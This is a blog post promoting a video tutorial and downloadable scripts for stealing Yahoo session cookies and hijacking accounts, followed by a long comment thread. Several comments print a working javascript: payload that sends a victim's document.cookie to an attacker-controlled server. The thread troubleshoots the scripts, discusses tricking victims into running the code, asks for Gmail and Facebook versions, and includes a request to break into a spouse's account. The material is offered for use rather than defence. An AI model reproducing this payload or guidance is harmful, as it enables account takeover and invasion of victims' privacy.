Contents of video -:

* Basics of attack
* Definition of session cookies
* Why only yahoo account
* Stealing session cookies
* Using stolen cookies to access yahoo account without credentials
* Demonstration of attack using two different browsers

Requirement -: Download the scripts from here.
Password to access one of the script is 'explore'

* This attack is working today (at time of writing ). The vulnerability might be patched  by respective organisations any time.





Note: I have written same article  here. Its not a video tutorial. Thanks to Mr.Mohit, admin of
cyberarmy.in for publishing it.

Feel free to ask any kind of queries in comments regarding tutorial or php code of the scripts .

73 comments:

Post a Comment
  1. Nice post ,well explained. next time,it will be better to say things than using text editor

    What about gmail?

  2. Thanks for your suggestion and feedback.

    Session Cookies are destroyed and become useless as the victim clicks ' Sign out ' in gmail, so attacker too gets logged out.

  3. Nice Post but not work , becoz i check in my5.gb ,i click haked.php a window comes out and i have given the password ''explore'' after that no id become show. can i ask why as become ?
    plz tell me what should be done?

  4. I just tried again and its working . Did you get cookies in 'cookies' directory you made ? What did happen when you ran the javascript in browser (victim's side) ?

  5. Tell you what this appears to only steal there email cookie which "technically" means they have to be logged into there Yahoo email i don't think this script will steal there chat cookie. I myself have never really messed with Yahoo's cookies so i can only assume. However this would be funny if you could send a link to the chat room and anyone who clicks on it it would steal there yahoo cookie and allow you to login to there account.

  6. Very neat. Getting someone to copy and paste that would be the challenge.

  7. @ZaraByte Thanks for your feedback. No, not chat cookies. yeah ofcourse one needs to be logged into his account. :)

    @The DIY guy Thanks. Yeah, good social engineering is required to get someone to copy this.

  8. Its not working cant get cookies in cooikes folder and even in the hacked.php...

  9. What did happen when you ran the javascript in browser (victim's side) ? gives any error or wat ?

  10. not working.. !!

  11. Hopefully the vulnerability has not been patched by yahoo yet. I checked 3 days ago. Kindly mention your query in detail.

  12. i think we still need modification to hack facebook account heheheh

  13. hi i uploaded the files in my3gb.com but wen the victim runs the javascript code its displays the following and no cookie is created in hacked.php
    ===========
    chmod???
    ===========

  14. Make sure that you have created a directory 'cookies' where cookies would be collected.

  15. Nice...It was working excellently,and thanks for giving such great knoledge. Now, i have a Q. that is: "Is it possible to delete anyone facebook profile?". Please tell me. Bcoz someone said that yes it is. So pls explain the procedure of delete and protect our acconut.

  16. May be you also stealing our cookies also with code iin php file ? When we open for checking password. and it stores on your server.

    Lemme explore its code and report back. :)

    and one more thing some one here :

    http://www.cyberarmy.in/2011/02/hack-yahoo-accounts-with-session-ids-or.html

    wrote that this method stops working , yahoo fix this issue.

    According to me cookies issue can never be fixed. Is it working now or really bug fixed ??

  17. We can also use manual cookie edit plugin :) once we got cookies from victims.

  18. you used this variable "$X44" and its no defined in your script ??

    What it does huh ?

    and also clear my doubt , when i run javascript directly in browser its working fine.

    But when I try to run via hyper link, or image hyperlink then it shows 2 error in browser and redirect to yahoo home page and also cookies not generated in this method (hyperlink).

    errors are:


    Notice: Undefined offset: 1 in here_link_of_my_site\yahoo.php on line 15

    Notice: Undefined offset: 1 in here_link_of_my_site\yahoo.php on line 17

  19. I wonder why you did not allow my previous comments :D and you deleted them.

    The reason behind it may be your script is suspious.

  20. The bug is not that we can access the account by stolen cookies. The bug is that the cookies are not destroyed on clicking "sign out".

    You have to run this code in same tab where yahoo account is opened. Then how are you doing this job through link ?

  21. cookies never destroyed by signout, Its same case for orkut,google,yahoo etc Cookies remains same and keep stored on server when we signout.

    So i think you ahould also try gmail and rediffmail. Using this method. You just need to identify cookies which are responsile for sign in(mail).

  22. Simply do you think, we can access any account using session cookies once stolen because these are never destroyed ?

  23. awesome, works perfect...can i get one like this fr gmail plz.??

  24. @aneesh , yes, it works for Orkut and Gmail also, For gmail sometime ago its working to login using cookies.

  25. Plz tell me can we do that for other website like orkut instead of Yahoo, and what we have to do for that? what changes we should make in it? plz help

  26. Plz tell me can we do that for other websites like orkut instead of yahoo? and what changes we should make for that. pls help

  27. You would have to change the whole code for gmail .


    I repeat that you wont remain logged in after the slave clicks "sign out" in Gmail.

  28. @Aneesh M.Maker and what about Facebook sir, Coding of which file do we need to cahnge, Pls guide me with that?

  29. Hello, I tried but it is not working for me..

  30. hey, everything is working up to stealing the cookie, but when i get to the hacking page and click on the link to get to that user's account, it returns "Sorry, the page you requested was not found". Can i get some help here please? i think its just the link that needs to be modified.

    Thank You

  31. does any one have the scrip to stell cookies for gmail and also when i eamil javascript:document.location='http://jsofferin.my3gb.com/yahoo.php?ex='.concat(escape(document.cookie)); yahoo dissable href=

  32. @aneesh.....yahoo.php. not working yar... and how we use it
    in facebook :)

  33. I would to write a php script for facebook now..

  34. but can you convert the java code to active link to click by victm ??

  35. but can you convert the java code to active link to click by victm ??

  36. can you convert the code to active link ??

  37. This can be converted into a link, using javascript "oncilck" event but we can not send javascripts in email.

  38. nice trick but is this method work on gmail account ?

  39. cool

  40. cool but is this method work on google account ?

  41. hey, when i download the file i only see only one file that says "cookiesstealer"

  42. really amazing

  43. first ty for the tutorial..it was helpful but lets say i got token and i can get to the victim inbox and his cookie too but what else i can do..i cant login to account info page because i dont have the pw as u know so i there anyway to login to info page without pw or what?

  44. thanx alot for expaining this topic
    please i have something to say
    u said that i have to enter the password given by ur site
    how can i register to be a member at ur site and have a password

  45. Well explained!

  46. interesting tutorial, thx!!!

  47. can some help me
    When i run the script,error has occur:
    Notice: Undefined variable: X44 in yahoo.php on line 9
    please help me to run it,without error,
    and what is X44?\
    I wait reply,

  48. Knowing the password of an account of yahoo messenger / email from ...registry, is there,knows who knows!!!

  49. Hacking is not as easy as you guys think........:D

  50. can some help me
    When i run the script,error has occur:
    Notice: Undefined variable: X44 in yahoo.php on line 9
    please help me to run it,without error,
    and what is X44?\
    I wait reply,

  51. the code that the victim should klik on...its not coming in link.....its just in simple format....plz help...

    javascript:document.location
    ='http://shreya6633.my3gb.com/yahoo.php?ex='.concat
    (escape(document.cookie));

    is it ryt?

  52. it's niceeee butttt pleaseeeeeeeeeeeeeeee can you tell how to steal facebook cookies.......pleaseeeeeee reply.....

  53. hey i am new to php. i learnt few codes but i can't open then. i downloaded a wamp server 5. but no use. someone pls help me for this.

  54. it really works.... butttt please can you tell meee how to steal cookies of facebook.pleaseeeeeeeeeeeeeeeeeee

  55. it works buttt please can you tell me how to steal cookies of facebook......pleaseeeee tell me

  56. can u telll me how to steal facebook cookies..... please tell me

  57. hi i uploaded the files in my3gb.com but wen the victim runs the javascript code its displays the following and no cookie is created in hacked.php
    ===========
    chmod???
    ===========

    and redirected

  58. no cookies is created.......

  59. hey bro..gr8 explaination..
    but not working..dont know why..
    worked as u said , it is redireced also to the yahoo mail page but when hacked.php is opened there is nothing..no data collected.
    is it works depends on browser ???
    all the above guys who got success in this method please tell there web browser..

    please help me

  60. Can u kindly upload this video tutorial again plsssssssssssssss

  61. A cookie is created, however, when i click on it, it says "page cannot be displayed" "currently unavailable". Has yahoo maybe fixed this? Can someone try?

  62. Hellop sir,
    Can you also upload GMAIL COOKIE STEALER?

  63. Hello Bro please add facebook and gmail stealer :) best regards REXUS351 <= thanks to moh1t also for attacking my website :))

  64. hey is there any oder way to execute javascript oder than copying it to browser?
    can we execute javascript on remote computer in any other meanz other than remote computer hackin?

  65. hey is there any oder way to execute javascript oder than copying it to browser?
    can we execute javascript on remote computer in any other meanz other than remote computer hackin?

  66. hello broda i need to know how can i make a cookie into link form to send the victim a link????please reply nice tut

  67. Where the fuck is download link, post newdownload Link
    ASAP!!

  68. upload again

  69. Please upload your video again!

  70. I wan to Hacked my Husband account because i believe he is fooling around with his co- worker. help pls if he do i will dump him soon.

  71. i cant even download d file

  72. your video has been removed.can you please send it to me
    my emailaddress= aadil93051@gmail.com

  73. the video has been deleted

Post a Comment